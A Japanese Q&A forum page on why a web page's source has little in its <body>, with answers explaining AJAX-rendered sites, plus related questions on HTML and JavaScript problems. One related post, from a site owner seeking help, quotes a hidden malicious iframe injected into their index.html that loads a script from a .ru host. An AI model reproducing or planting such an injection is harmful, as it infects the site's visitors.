• 締切済み

このようなホームページの作り方を教えてください

https://lightroom.adobe.com/academy/genres/food/point-of-view?trackingid=25XLCNP8&mv=email このページのソースを見ると、<body>にあまり記述がないです。このようなページはどのように作られていますか?また、習う方法を教えてください。

みんなの回答

回答No.2

><body>にあまり記述がないです。 DOM構築型サイトはこんなもんです。 ページが開いてから表示物を作っていく方式で。 XHR(AJAX)などでは、ページの閲覧中例えば、 画面の下まで来てから、さらに下をリクエストして、 最初の表示段階では、作らない!とすることで レスポンスを向上させたり(不要な物を元から読まない) または、画面の一部に数字などがあり、リアルタイムに変わるなど。 こういったテクニックを使っておりますので。 今回は、JavaScript/Jquery(など)を勉強したいと 質問者さんは書かれているのと同じと判断します。

全文を見る
すると、全ての回答が全文表示されます。
  • umimonogat
  • ベストアンサー率50% (798/1583)
回答No.1

HTMLの知識あればソースの表示でHTMLをカスタマイズする。

全文を見る
すると、全ての回答が全文表示されます。

関連するQ&A

  • Googleストリートビューの写真を切り替えるスクリプトがIE6だけ動作しない原因を知りたいです。

    Googleストリートビューを使って、 テキストリンクで写真を切り替えるページを作りました。 ソースは下記に記述したものです。 こちらをブラウザで確認したところ FirefoxやIE7では問題なく動作しましたが、 IE6だけマップは移動するものの、 ストリートビューが移動しませんでした。 <html> <head> <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=[APIキー]" type="text/javascript"></script> </head> <body onload="load()"> <div id="street" style="width:320px;height:200px"></div> <div id="map" style="width:320px;height:200px"></div> <ol> <li><a href="#" onClick="map01();return false">地図1を表示</a></li> <li><a href="#" onClick="map02();return false">地図2を表示</a></li> </ol> <script type="text/javascript"> //<![CDATA[ function load() { map = new GMap2(document.getElementById("map")); map.setCenter(new GLatLng(35.655, 139.744), 18); panorama = new GStreetviewPanorama(document.getElementById("street")); } // 地図1 function map01() { var point = new GLatLng(35.655, 139.744); map.panTo(point); panorama.setLocationAndPOV(point); } // 地図2 function map02() { var point = new GLatLng(35.657, 139.751); map.panTo(point); panorama.setLocationAndPOV(point); } //]]> </script> </body> </html> 以上のソースになります。 原因がお分かりになる方いらっしゃいますでしょうか。 ちなみに、ストリートビューの画面がローカル環境で動かないため、 APIキーを取得したWebページでしか確認できないかもしれません。。 お手数になってしまいますが、よろしくお願いします。

    • ベストアンサー
    • AJAX
  • ホームページを自動にジャンプ

    自分の作っているホームページなんですが、 トップページから5秒すると自動的に次のページに ジャンプするようにソースを記述したのですが、 ほぼ100%の確立でジャンプしかけて、ブラウザが フリーズしてしまい、IEを強制終了するしかなく なってしまいます。(T.T) どうしてでしょうか? ソースは onLoad=setTimeout("location.href='http://www.******.com/top.htm'",5000)> です。(5秒後にtop.htmファイルへジャンプ) 記述に間違いがあるのでしょうか? それとも、top.htmファイルに問題があるのでしょうか?(;>_<;) 閲覧するPCの問題化と思ったのですが、OS98、OS95、NT4.0、OSXPの4種類で試みましたが全てダメでした。 めちゃめちゃ困っています。誰か分かる方教えてください!!!!!

    • ベストアンサー
    • HTML
  • 動画やフラッシュファイルをダウンロードされにくくする

    ホームページ上で自作の動画やフラッシュを公開したいと思います。 ソースを見られてもなるべくリンクしているファイルのパスを知られにくくしたいです。 http://super-movies.com/mv/wa-ken_vs_gan.htm のサイトのようにソースを見てもぐちゃぐちゃになるようにしたいのですがどのように記述すればいいでしょうか?

    • ベストアンサー
    • HTML
  • Flashで作ったtopページのブラウザのサイズについて

    flashで800×600のtopページを作りました とりあえずHTMLに設置してみました <html> <head> <title></title> </head> <body> <embed src="top[1].swf" type="application/x-shockwave-flash" width="800" height="600" pluginspage="http://www.adobe.com/go/getflashplayer_jp" /> </body> </html> 私は1026×756くらいで見ているのですが表示させると周りが余白で800×600のtopページのflash画像が表示されました 余白がないようにぴったり表示させるにはどうしたらいいでしょうか 自分なりに調べてjavaスクリプトの記述もしてみたりscale="exactfit" を記述してみたりしてみましたがうまくいかないのでアドバイスお願いします まだ始めたばっかりなので初心者な質問でごめんなさい よろしくお願いします

  • ホームページを作成中です。

    ホームページを作成中です。 IEでみると思った通りに表示されるのですがgoogle chromeでみると画像も表示されず、文字さえも表示されません。   ソースはこんな感じなのですが、おかしいところがあればご指摘ください。   <HTML> <HEAD> <TITLE>ホームページ名</TITLE> <style type="text/css"> <!-- BODY, TH, TD { font-size: 10pt;font-family: 'Osaka,MS Pゴシック'color: #513F26; } --> </style> </HEAD> <BODY> <Div Align="center"> <img src="http://~~.com/top_logo.gif"> <br> <img src="http://~~.com/rain.gif"> <br> <br> 文字 </Div> </BODY> </HTML>     インラインフレーム(たてで2分割)の予定で、左側のページです。 宜しくお願いします。

  • JSPやServlet参考ソースについて

     美しいソースをいろいろ見て勉強したいのですが、外国のホームページでもいいので、どこか見本ソースをたくさんのせているページをご存知のかたいらっしゃいましたら教えてくださいませんか。私も知る限り外国のページですが書いておきます。 スターデベロッパー http://stardeveloper.com/ チュートリアル・ファインド http://www.tutorialfind.com/tutorials/default.asp Jguru http://www.jguru.com/ Jsp Insider http://www.jspinsider.com/index.view

    • ベストアンサー
    • Java
  • jpg画像をブラウザで表示ではなくダウンロードさせる方法

    http://code.nanigac.com/source/view/461 jpg画像を、ブラウザで表示ではなくダウンロードさせる方法を探していて上記ページにたどり着きました。 上記の例ですと「<a href="download.php?file=test.jpg">」といったようにHTML側に余分な記述が必要になります。 これを「<a href="test.jpg">」というようにシンプルに出来ないでしょうか。 よろしくお願いします。

    • ベストアンサー
    • PHP
  • FBのいいねボタンが表示されません!

    https://developers.facebook.com/docs/plugins/like-button このページを参考にして、Get codeでソースを拾ったのですが、まず上のコードを<body>直下に、下のコードを表示したい場所に記述しましたが、何も表示されません。 ローカルでの確認です。 もしかしてサーバー上でないと確認できないのでしょうか? それと、いいね!ではなく、海外のサイトなのでlike!にしたいと思います。ソースのどこかをen-USなど変換すればいいのでしょうか。 どうぞ宜しくお願い致します。

  • ホームページにグーグルストリートビューを設置した際に画面トップから表示されない。

    お世話になります。 ホームページに下記のような、グーグルストリートビューを設置し、 画面を開くと、画面がトップから表示されず、ストリートビューのある 下の位置から表示されてしまいます。 ページを開いた時に画面の一番上から表示させるにはどの様にしたらよろしいでしょうか。 対応策をご教授頂ければ幸いです。 宜しく、お願いします。 <html> <head> </head> <body> <TR><TD> <iframe width="500" height="1000"></iframe><BR> <iframe width="500" height="350" src="http://下記"></iframe> </TD></TR> </body> </html> http://以降は、maps.google.com/maps?ie=UTF8&amp;layer=c&amp;cbll=35.681506,139.765162&amp;panoid=kY5FDyaev8U_pSRPd7tMzQ&amp;cbp=13,99.92,,0,-3.15&amp;ll=35.681621,139.765274&amp;spn=0,359.998493&amp;z=19&amp;source=embed&amp;output=svembed

  • ホームページのウイルス?スパム?について・・・

    ホームページを作成して約2年ほど公開しています。 ここ1ヵ月もたたないぐらいから作成したホームページを閲覧するとページの表示のされかたがおかしく、ページのトップがmargin-top200pxぐらい自動でかかっています。 しかもウイルスソフトにも引っかかります。 自分の記入ミスだと思い、確認したのですが、記述に間違いはなくページのtopにmargin-top200pxの記述はしていませんでした。 不気味に思ったので、サーバーにあがっているファイルを一時削除してもう一度アップしなおしました。 ところが数日後また同じ現象が起きていました。 毎回ウイルスソフトが「アクセスしたファイルは感染しています」と表示されます。 おかしいと思ったので、表示されているページのソースをブラウザ上からみたところ<html><head></head><body>のところに <iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe> という記述がありました。 これを調べたのですが、何も得られず、削除をしても数日後には復活しています。 また、必ずindex.htmlファイルが感染しているようです。 他のページ(member.html)などは感染していませんでした。 友達のPC(ウイルスバスター)でも引っかかると言っていました。 自分のはウイルスソフトはAVGを使用しています。 質問内容はまずどのようにしたら感染しているものを削除できるのでしょうか? また、<iframe src="http://x3y.ru:8080/index.php" width=154 height=200 style="visibility: hidden"></iframe>はなんでしょうか? ご教授お願いします。

このQ&Aのポイント
  • 彼32モラハラ気味精神病で感情を制御できず、私22の摂食障害が原因でつらい日々を送っていました。
  • 彼の暴言や暴力に耐えかね、警察に相談しましたが、誓約書を書かせて別れることになりました。
  • 今は彼にブロックされてしまい、親にもバレてしまった状況ですが、警察に相談したのは正しい判断だったと思っています。
回答を見る

専門家に質問してみよう